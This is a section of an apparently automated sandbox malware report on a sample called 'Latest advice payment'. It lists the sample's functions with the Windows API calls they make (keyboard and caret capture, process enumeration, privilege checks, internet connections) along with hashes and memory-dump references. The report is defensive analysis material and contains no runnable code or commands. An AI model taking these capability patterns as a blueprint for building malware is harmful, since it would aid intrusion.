                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 144a4072d6f4923bbd6f3702163ab9b863128c10e99dae8efe0624f5d8186db5
                                                            • Instruction ID: 814f60ff5d35d33dcf259e9ed6903ffb2901b2cda6ecc76057f60877cdb85701
                                                            • Opcode Fuzzy Hash: 144a4072d6f4923bbd6f3702163ab9b863128c10e99dae8efe0624f5d8186db5
                                                            • Instruction Fuzzy Hash: 1A312230940618EEFF348AA58C09FFEBFAABB85320F04672EE491521D1C3799D4597A1
                                                            Function 005961C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005961FB
                                                            • __isleadbyte_l.LIBCMT ref: 00596229
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00596257
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0059628D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 32cadd3ad4220d9ddfdd99292a9febbb86a880565b28c1d25525b29c83255ac0
                                                            • Instruction ID: 6ab572314c8f22431e7d45b304e621d852f8b038e9992605bb1b7ea24d3aa1b5
                                                            • Opcode Fuzzy Hash: 32cadd3ad4220d9ddfdd99292a9febbb86a880565b28c1d25525b29c83255ac0
                                                            • Instruction Fuzzy Hash: 7331E134604246AFDF228F75CC48BBA7FB9FF82310F154429E864971A1DB30E958DB90
                                                            Function 005E4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 005E4F02
                                                              • Part of subcall function 005C3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005C365B
                                                              • Part of subcall function 005C3641: GetCurrentThreadId.KERNEL32 ref: 005C3662
                                                              • Part of subcall function 005C3641: AttachThreadInput.USER32(00000000,?,005C5005), ref: 005C3669
                                                            • GetCaretPos.USER32(?), ref: 005E4F13
                                                            • ClientToScreen.USER32(00000000,?), ref: 005E4F4E
                                                            • GetForegroundWindow.USER32 ref: 005E4F54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: ca333164d96a3162a386dba12003b6936c5798e81c0d7dd868b15afc220d1d61
                                                            • Instruction ID: 8233e477a0dc7d956ff690245ae67b4d7c2053847f212395f40c8f8ff5d51016
                                                            • Opcode Fuzzy Hash: ca333164d96a3162a386dba12003b6936c5798e81c0d7dd868b15afc220d1d61
                                                            • Instruction Fuzzy Hash: 99312CB1D00109AFCB14EFA5C8899EFBBFDFF98300B10406AE455E7241DA719E458BA1
                                                            Function 005C3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 005C3C7A
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 005C3C88
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 005C3CA8
                                                            • CloseHandle.KERNEL32(00000000), ref: 005C3D52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: 855611c87451576fcf1d0f4c74d5ce4e8f0cabc6631c44885e7505062692b216
                                                            • Instruction ID: 4b68dcf22f78802b1b692094dad9de508b6ddd87b7e9c1530e19f242c04ddcb2
                                                            • Opcode Fuzzy Hash: 855611c87451576fcf1d0f4c74d5ce4e8f0cabc6631c44885e7505062692b216
                                                            • Instruction Fuzzy Hash: 07315E7110834A9FD314EF54C885EAEBFE8BFD9354F50482DF482871A1EB719A49CB92
                                                            Function 005EC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • GetCursorPos.USER32(?), ref: 005EC4D2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0059B9AB,?,?,?,?,?), ref: 005EC4E7
                                                            • GetCursorPos.USER32(?), ref: 005EC534
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0059B9AB,?,?,?), ref: 005EC56E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 02996ba9b08ed47acfec3b1db3375c9cacf16eb5e0ca240c400b80c6033adc7c
                                                            • Instruction ID: 1365ba3784d075ddfd681cb91e0c22e42dd4b1bdec7676aa6212b63104ac6dd5
                                                            • Opcode Fuzzy Hash: 02996ba9b08ed47acfec3b1db3375c9cacf16eb5e0ca240c400b80c6033adc7c
                                                            • Instruction Fuzzy Hash: A9319335500498AFCF298F59C898EBE7FB6FB49310F044066F9858B261CB31AD51DFA4
                                                            Function 005B8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005B8121
                                                              • Part of subcall function 005B810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005B812B
                                                              • Part of subcall function 005B810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005B813A
                                                              • Part of subcall function 005B810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005B8141
                                                              • Part of subcall function 005B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005B8157
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005B86A3
                                                            • _memcmp.LIBCMT ref: 005B86C6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005B86FC
                                                            • HeapFree.KERNEL32(00000000), ref: 005B8703
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: 0b70b25eff2d43fd305585755732512e5a3954c539213c988683aa373bbcd00a
                                                            • Instruction ID: 28171aba25a3d53c8f894270f14fd0aa893c84ee72d951b7df0e51daffd12749
                                                            • Opcode Fuzzy Hash: 0b70b25eff2d43fd305585755732512e5a3954c539213c988683aa373bbcd00a
                                                            • Instruction Fuzzy Hash: 91216972E01109EBDB14DFA8C949BFEBBB8FF65344F158059E844AB241DB31AE05DB90
                                                            Function 0058098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __setmode.LIBCMT ref: 005809AE
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,005C7896,?,?,00000000), ref: 00565A2C
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,005C7896,?,?,00000000,?,?), ref: 00565A50
                                                            • _fprintf.LIBCMT ref: 005809E5
                                                            • OutputDebugStringW.KERNEL32(?), ref: 005B5DBB
                                                              • Part of subcall function 00584AAA: _flsall.LIBCMT ref: 00584AC3
                                                            • __setmode.LIBCMT ref: 00580A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: b1e4df6a8500dadc945d16c316173fc89007e22dc96c3715d3d108e11733e93e
                                                            • Instruction ID: f5963e201cdf3beb77adf8136975db7ca5ee6ea068689eb97a2fccf22559f28e
                                                            • Opcode Fuzzy Hash: b1e4df6a8500dadc945d16c316173fc89007e22dc96c3715d3d108e11733e93e
                                                            • Instruction Fuzzy Hash: EB110231904647AFDB08B2F49C4E9BE7FA8BFC1320F240119FA05671C2FE3159469BA1
                                                            Function 005D1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005D17A3
                                                              • Part of subcall function 005D182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005D184C
                                                              • Part of subcall function 005D182D: InternetCloseHandle.WININET(00000000), ref: 005D18E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 22089703d38500c4e5c2dfbf35859c7bc6bc52d27d3dbdced96c91750f7ab7e4
                                                            • Instruction ID: 2690e36493b384ad5b2dd94a7a0ddcad119aeac9f2c99e0e6adcd143f8af446b
                                                            • Opcode Fuzzy Hash: 22089703d38500c4e5c2dfbf35859c7bc6bc52d27d3dbdced96c91750f7ab7e4
                                                            • Instruction Fuzzy Hash: 8F21F631200A01BFEB269F68DC40FBABFA9FF98710F10442BF9519A750DB71D810A7A4
                                                            Function 005C3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,005EFAC0), ref: 005C3A64
                                                            • GetLastError.KERNEL32 ref: 005C3A73
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 005C3A82
                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,005EFAC0), ref: 005C3ADF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: f0901d15f4d6c3fd518b2ba7a25eb4adecd6314580353ea6a71b6a60d10aded9
                                                            • Instruction ID: adbdce5e9743cd81410213f9dc7764a68ea1d4b3a405d581ecf1913eab2ca328
                                                            • Opcode Fuzzy Hash: f0901d15f4d6c3fd518b2ba7a25eb4adecd6314580353ea6a71b6a60d10aded9
                                                            • Instruction Fuzzy Hash: 972194745082099F8310DF64CC85D6A7FE4BE59368F148A2DF4D9C72A1DB31DE59CB82
                                                            Function 005950E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00595101
                                                              • Part of subcall function 0058571C: __FF_MSGBANNER.LIBCMT ref: 00585733
                                                              • Part of subcall function 0058571C: __NMSG_WRITE.LIBCMT ref: 0058573A
                                                              • Part of subcall function 0058571C: RtlAllocateHeap.NTDLL(01060000,00000000,00000001,00000000,?,?,?,00580DD3,?), ref: 0058575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7fbec0713f8b8a58c3ca44b3ac42801622871795eac2f225e418e27793149e17
                                                            • Instruction ID: 99cd53071c81327d7c98a41610dd396b105b553c0ae81a5a157123b84811a29a
                                                            • Opcode Fuzzy Hash: 7fbec0713f8b8a58c3ca44b3ac42801622871795eac2f225e418e27793149e17
                                                            • Instruction Fuzzy Hash: E411A372901A16AECF323F74AC4976D3F98BB943A1B104929FD85AA250EF348951E790
                                                            Function 005644A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005644CF
                                                              • Part of subcall function 0056407C: _memset.LIBCMT ref: 005640FC
                                                              • Part of subcall function 0056407C: _wcscpy.LIBCMT ref: 00564150
                                                              • Part of subcall function 0056407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00564160
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00564524
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00564533
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0059D4B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: c3b2aaa966f3372d93b266045c961a3c0b62ef20b5640d897fd47bf544125fcc
                                                            • Instruction ID: d8bb3b9c324e76416be5e9cf1eaf6d61ea3dd56202ed862c6c5a40fc1ccda20e
                                                            • Opcode Fuzzy Hash: c3b2aaa966f3372d93b266045c961a3c0b62ef20b5640d897fd47bf544125fcc
                                                            • Instruction Fuzzy Hash: 3121F5705047849FEB328B248849BE7BFECBB11314F04049DE68E5B181C7B42A84CB51
                                                            Function 005D6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,005C7896,?,?,00000000), ref: 00565A2C
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,005C7896,?,?,00000000,?,?), ref: 00565A50
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 005D6399
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D63A4
                                                            • _memmove.LIBCMT ref: 005D63D1
                                                            • inet_ntoa.WSOCK32(?), ref: 005D63DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: 3c8574c9aa961aa871b2a573de4d32775aeab953b7b9795f3756cb3df5ec99ed
                                                            • Instruction ID: 55c34b8253d10dbcf6feaed502784319b2f97a4716c91eaefc603568d0709b5d
                                                            • Opcode Fuzzy Hash: 3c8574c9aa961aa871b2a573de4d32775aeab953b7b9795f3756cb3df5ec99ed
                                                            • Instruction Fuzzy Hash: 34112E7150010AAFCB14FBA4DD8ACEEBBB8BF98310B544466F545A7261EF30AE14DB61
                                                            Function 005B8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 005B8B61
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005B8B73
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005B8B89
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005B8BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: a82a88c7a996d77c2902a626bf6b1b82346b8d9054a0b00aefd817073ae248af
                                                            • Instruction ID: 25ae02dbad5641cbbd1f85c49181fb5f1ef09452b5034ccb27884443979fe263
                                                            • Opcode Fuzzy Hash: a82a88c7a996d77c2902a626bf6b1b82346b8d9054a0b00aefd817073ae248af
                                                            • Instruction Fuzzy Hash: DE110A79901218FFDB11DBA5C885EADBB78FB48710F204095E900B7250DA716E11DB94
                                                            Function 00561290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 005612D8
                                                            • GetClientRect.USER32(?,?), ref: 0059B5FB
                                                            • GetCursorPos.USER32(?), ref: 0059B605
                                                            • ScreenToClient.USER32(?,?), ref: 0059B610
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: d519925238a8b46827841ec254f117be45da5c8bbc114074bf35700eb848928f
                                                            • Instruction ID: d9eda76c8b5369bcf74873c5b623a3150553dba141bc4d9d0a9c8360ebf9a11d
                                                            • Opcode Fuzzy Hash: d519925238a8b46827841ec254f117be45da5c8bbc114074bf35700eb848928f
                                                            • Instruction Fuzzy Hash: B411583990085AABCF14EFA9D8999BE7BB8FB55300F000456FA41E7140CB30BA559BA9
                                                            Function 005BD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 005BD84D
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 005BD864
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005BD879
                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005BD897
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: 48bd572023f5af31604dbaf8d1883cf48042d03469b7296bfe0c29ef68d3364c
                                                            • Instruction ID: 2f86bf682b61ebe25fa884ea2302b5e1238567e3464eedf0040036291e7c8547
                                                            • Opcode Fuzzy Hash: 48bd572023f5af31604dbaf8d1883cf48042d03469b7296bfe0c29ef68d3364c
                                                            • Instruction Fuzzy Hash: 49115E75605704DBE7208F50DC48F92BBBCFB00B01F108969B556D6090E7B1F549ABB1
